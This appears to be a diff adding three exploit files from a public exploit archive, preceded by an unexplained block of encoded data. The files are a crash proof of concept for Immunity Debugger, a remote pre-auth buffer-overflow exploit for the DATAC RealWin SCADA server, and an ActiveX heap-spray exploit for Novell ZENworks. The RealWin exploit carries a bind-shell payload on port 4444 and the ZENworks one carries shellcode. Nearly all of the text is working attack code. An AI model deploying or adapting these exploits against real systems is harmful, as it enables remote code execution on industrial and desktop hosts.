 H1oU7jMJ+ZBJWr7CQFaK74pLLty/olLgs/XKa8J+0AiE/cA0h0hNUrj2OeFn+gC6
 XPV+hmZP2ait2Ygd6uUegzOVTXUQjz4c6opNwptim4Cb8Dgg6Fojb2z5rRblcSNw
 BYBO+KHhP+1TRyWZ+0okcOH5QzJiI55TlLt73yFHcObBnJq54Tdgnb38sNIBSQ59
 0zyp+rIU0E7oJ6MKfkiK7pcvlzCKMJ/XAwl0TW8KXRYJ3UePLPAhGzXFr74GAuJH
 ts8rxY/PCD13OjMzC1/GfHCghZ2z9Bypd6qCV3zPWtEUQtY5VntEB8+XWotnqL94
 lcAFuPXZG8PKAh4vLdB95LvyUIjjSuoRIeuW1rWxk9n1Yc145G/t0Hr/JldWrlA1
 hrDwdGyk7AiOS1Lps7dbVy4UIBsqEQMgpVDq4EnUQWWJJPD6NAauNAfQcCW7WOaN
 Xo6uDahb6EpGFc2TZ+7RQjlubiOvGJcuJUVsxRJxtIgxrPJETQtX41hs/QJgrZu5
 n6E4Vsj9N0Nk5uZ/TpYEg/cSpLkq+NluVH1IISWXJKcYDWV+rrtV4dQhV1tRX0+s
 yNUVWspkKrVVtcMw/1Z1avEEFb0AggarZQfGcElnIU9drKzKDylDsriUp2i6k+mG
 taNUIpevqEm9vkOt3wU1opVdBDDCNHeSXNF2+WJO7dWKV5jIR+3Rj0qeFb6Ja0So
 JOX2K6CzyOtZGI7fZIN4o4ziZNX5BoTww30sm1beTF2MAdi+uYmObVBP1BlNlJj9
 cO5KLKX4hrRSM10tay3tNlkXZLMtPiiUSdbfe6oMb7KFv98tXvrj39Rq6dcqVo5b
 PFq0pFZL1JJJ1S86Jo+eLTWoBXJSpyj6uvqqpCONV6ysjb09RW01ZqqsYOTM1dWw
 Fu+XMtTcSipAoKMOFrxDkEvVHVYZW1nH+sWz5ys1azPiO3Sk3NnYoVax20ksS9Wq
 TEv1CPCnDariWxTSfQ22tErsQqwNb6FXlYsoZTLtnq70KlN5KpKNacqZzUbQ3DbX
 VtLqYvqps+RqHsc561oFgzJdIkNrV9SAN3dvG6UCpRHU0rvWWejXktWJyUnEJQOm
 +/he2VPUKUmqmFKu48tP0NRBKBauqa/V+EhT0tdSyNoeUgOyyTJZSJaSWJSvry5g
 y6N5buuTY8iEZO7qQaVOX1TCpXPy5Up2VVOy2N5e/NfP9SIuUgkW7bjSxFHyZdM1
 ysPSsB6mj4NrYXL0CoNT6GSuJL8CCnf87NkTcBPbItco7t2zjI0Yp3Eh9IiQbknO
 W8FiRkXuqXS91d7OyjFWzl2blDkMfN1N/ich/l81RPLlEdysZyZSym13LJ/K+NJe
 0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA=
--- a/platforms/windows/dos/32435.c
+++ b/platforms/windows/dos/32435.c
@ -0,0 +1,46 @@
 /* Filename :  Crash_POC.cpp
 # Exploit Title: [title]
 # Date: 20 March 2014
 # Exploit Author: Veysel HATAS (vhatas@gmail.com) - Web Page : www.binarysniper.net
 # Vendor Homepage: https://www.immunityinc.com/
 # Software Link: https://www.immunityinc.com/products-immdbg.shtml
 # Version: 1.85
 # Tested on: WinXP, Win7
 */
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 int g_Count;
 void foo(char *data);
 int main(int argc, char* argv[])
 {
      g_Count = 0;
      foo(argv[1]);
      return 0;
 }
 void foo(char *data)
 {
      char salla[10];
      printf("Deneme - %d\n", g_Count);
      g_Count++;
      if (g_Count == 510){
            strcpy(salla, data);
      }
      try{
            foo(data);
      }
      catch(int e){
            printf("Error code is : %d", e);
      }
 }
--- a/platforms/windows/remote/32426.c
+++ b/platforms/windows/remote/32426.c
@ -0,0 +1,214 @@
 source: http://www.securityfocus.com/bid/31418/info
 DATAC RealWin SCADA server is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to execute arbitrary code in the context of the affected application. This may facilitate the complete compromise of affected computers. Failed exploit attempts may result in a denial-of-service condition.
 RealWin SCADA server 2.0 is affected; other versions may also be vulnerable. 
 ////////////////////////////////////////////////////////////////////
 ////    DATAC RealWin 2.0 SCADA Software        - Remote PreAuth Exploit -. 
 ////    --------------------------------------------------------
 ////    This code can only be used for personal study
 ////    and/or research purposes on even days.
 ////
 ////    The author is not responsible for any illegal usage.
 ////    So if you flood your neighborhood that's your f******* problem =)
 ////    ---------------
 ////    Note
 ////    ---------------
 ////    ## The exploit has been tested against a build that seems pretty old.
 ////    ## Therefore this flaw may be not reproducible on newer versions.
 ////    
 ////    http://www.dataconline.com
 ////    http://www.realflex.com/download/form.php
 ////    
 ////    Ruben Santamarta www.reversemode.com
 ////    
 #include <winsock2.h>
 #include <windows.h>
 #include <stdio.h>
 #pragma comment(lib,"wsock32.lib")
 #define REALWIN_PORT    910
 #define PACKET_HEADER_MAGIC 0x67542310
 #define EXPLOIT_LEN             0x810
 #define PING_LEN                0x200
 #define FUNC_INFOTAG_SET_CONTROL        0x5000A
 #define FUNC_PING               0x70001
 typedef struct {
        const char *szTarget;
        ULONG_PTR retAddr;
 } TARGET;
 TARGET targets[] = {
                { "Windows 2000 SP4 [ES]",      0x779D4F6A},    // call esp - oleaut32.dll
        { "Windows 2000 SP4 [EN]",      0x77E3C256 },   // jmp esp - user32.dll
        { "Windows XP SP2 [EN]",        0x7C914393 },   // call  esp - ntdll.dll 
                { "Windows XP SP2 [ES]",        0x7711139B},    // call esp - oleaut32.dll
                { NULL,0xFFFFFFFF}
 }; 
 int main(int argc, char* argv[])
 {
        WSADATA ws; 
        SOCKET tcp_socket, tcp_ping; 
        char bBuffer[0x10] = {0};
        struct sockaddr_in peer;
        char *pExploitPacket = NULL;
        char *pPingPacket = NULL;
        ULONG_PTR       uFixed;
        /* win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
        unsigned char scode[] =
        "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"
        "\xd8\xfb\x1b\x83\xeb\xfc\xe2\xf4\x59\xb2\x10\x56\x4d\x21\x04\xe4"
        "\x5a\xb8\x70\x77\x81\xfc\x70\x5e\x99\x53\x87\x1e\xdd\xd9\x14\x90"
        "\xea\xc0\x70\x44\x85\xd9\x10\x52\x2e\xec\x70\x1a\x4b\xe9\x3b\x82"
        "\x09\x5c\x3b\x6f\xa2\x19\x31\x16\xa4\x1a\x10\xef\x9e\x8c\xdf\x33"
        "\xd0\x3d\x70\x44\x81\xd9\x10\x7d\x2e\xd4\xb0\x90\xfa\xc4\xfa\xf0"
        "\xa6\xf4\x70\x92\xc9\xfc\xe7\x7a\x66\xe9\x20\x7f\x2e\x9b\xcb\x90"
        "\xe5\xd4\x70\x6b\xb9\x75\x70\x5b\xad\x86\x93\x95\xeb\xd6\x17\x4b"
        "\x5a\x0e\x9d\x48\xc3\xb0\xc8\x29\xcd\xaf\x88\x29\xfa\x8c\x04\xcb"
        "\xcd\x13\x16\xe7\x9e\x88\x04\xcd\xfa\x51\x1e\x7d\x24\x35\xf3\x19"
        "\xf0\xb2\xf9\xe4\x75\xb0\x22\x12\x50\x75\xac\xe4\x73\x8b\xa8\x48"
        "\xf6\x8b\xb8\x48\xe6\x8b\x04\xcb\xc3\xb0\xea\x47\xc3\x8b\x72\xfa"
        "\x30\xb0\x5f\x01\xd5\x1f\xac\xe4\x73\xb2\xeb\x4a\xf0\x27\x2b\x73"
        "\x01\x75\xd5\xf2\xf2\x27\x2d\x48\xf0\x27\x2b\x73\x40\x91\x7d\x52"
        "\xf2\x27\x2d\x4b\xf1\x8c\xae\xe4\x75\x4b\x93\xfc\xdc\x1e\x82\x4c"
        "\x5a\x0e\xae\xe4\x75\xbe\x91\x7f\xc3\xb0\x98\x76\x2c\x3d\x91\x4b"
        "\xfc\xf1\x37\x92\x42\xb2\xbf\x92\x47\xe9\x3b\xe8\x0f\x26\xb9\x36"
        "\x5b\x9a\xd7\x88\x28\xa2\xc3\xb0\x0e\x73\x93\x69\x5b\x6b\xed\xe4"
        "\xd0\x9c\x04\xcd\xfe\x8f\xa9\x4a\xf4\x89\x91\x1a\xf4\x89\xae\x4a"
        "\x5a\x08\x93\xb6\x7c\xdd\x35\x48\x5a\x0e\x91\xe4\x5a\xef\x04\xcb"
        "\x2e\x8f\x07\x98\x61\xbc\x04\xcd\xf7\x27\x2b\x73\x4a\x16\x1b\x7b"
        "\xf6\x27\x2d\xe4\x75\xd8\xfb\x1b";
        int i,c;
        system("cls");
        printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n");
        printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n");
        printf("\nRuben Santamarta - reversemode.com \n\n");
        if( argc < 3 )
        {
                printf("\nusage: exploit.exe ip TargetNumber");
                printf("\n\nexample: exploit 192.168.1.44 1\n\n");
                for( i = 0; targets[i].szTarget; i++ )
                {
                        printf("\n[ %d ] - %s", i, targets[i].szTarget);
                }
                printf("\n");
                exit(0);
        }
        WSAStartup(0x0202,&ws);
        peer.sin_family = AF_INET;
        peer.sin_port = htons( REALWIN_PORT );
        peer.sin_addr.s_addr = inet_addr( argv[1] ); 
        tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
        if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
        {
                printf("\n[!!] Host unreachable :( \n\n");
                exit(0);
        }
        pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) );
        pPingPacket = (char*) calloc( PING_LEN, sizeof(char) );
        memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN);
        memset( (void*)pPingPacket, 0x90, PING_LEN);
        uFixed =  targets[atoi(argv[2])].retAddr;
        for( i=0x0; i< 0xbe; i++)
        {
                *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket  + i*sizeof(ULONG_PTR) +2 )  ) = uFixed;
        }
        // Bypass silly things.
        *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket  + 0xbe*sizeof(ULONG_PTR) +2 )  ) = 0x404040; 
        // MAGIC_HEADER
        *( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC;
        //Payload Length
        *( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800;                         
        //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL)
        *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) =  FUNC_INFOTAG_SET_CONTROL;
        //First Parameter
        *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) =  0x4; // Internal Switch
        //Mark
        *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) =  0xDEADBEEF; // Our marker
        memcpy( (void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode))
                        ,scode
                        ,sizeof(scode)-1);
        send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 );
        printf("[+] Exploit packet sent...now checking host availability\n");
        // MAGIC_HEADER
        *( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC;
        //Payload Length
        *( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20;                             
        //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL)
        *( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) =  FUNC_PING;
        //First Parameter
        *( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) =  0x1;   // whatever
        //Mark
        *( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) =  0xDEADBEEF; //Our marker
        tcp_ping = socket(AF_INET, SOCK_STREAM, 0);
        if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
        {
                printf("\n[!!] Host died, long live to the Host!  \n\n");
                exit(0);
        }
        i = recv(tcp_ping, bBuffer, 0x8, 0 );
        if( i )
        {
                printf("[+] The host is up and running\n\t:: %d bytes received: ",i);
                for(  c = 0; c<i; c++)
                        printf("%02X ", (unsigned char)bBuffer[c]);
                printf("\n");
        }else   {
                printf("\n[!!] Host died, long live to the Host!  \n\n");
        }
        closesocket(tcp_ping);
        closesocket(tcp_socket);
        Sleep(1000);
        printf("\n[+] Try: telnet %s 4444\n\n",argv[1]);        
        WSACleanup();
        return 0;
 }
--- a/platforms/windows/remote/32429.html
+++ b/platforms/windows/remote/32429.html
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/31435/info
 Novell ZENworks Desktop Management ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
 An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
 ZENworks Desktop Management 6.5 is vulnerable; other versions may also be affected.
 < html> < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html>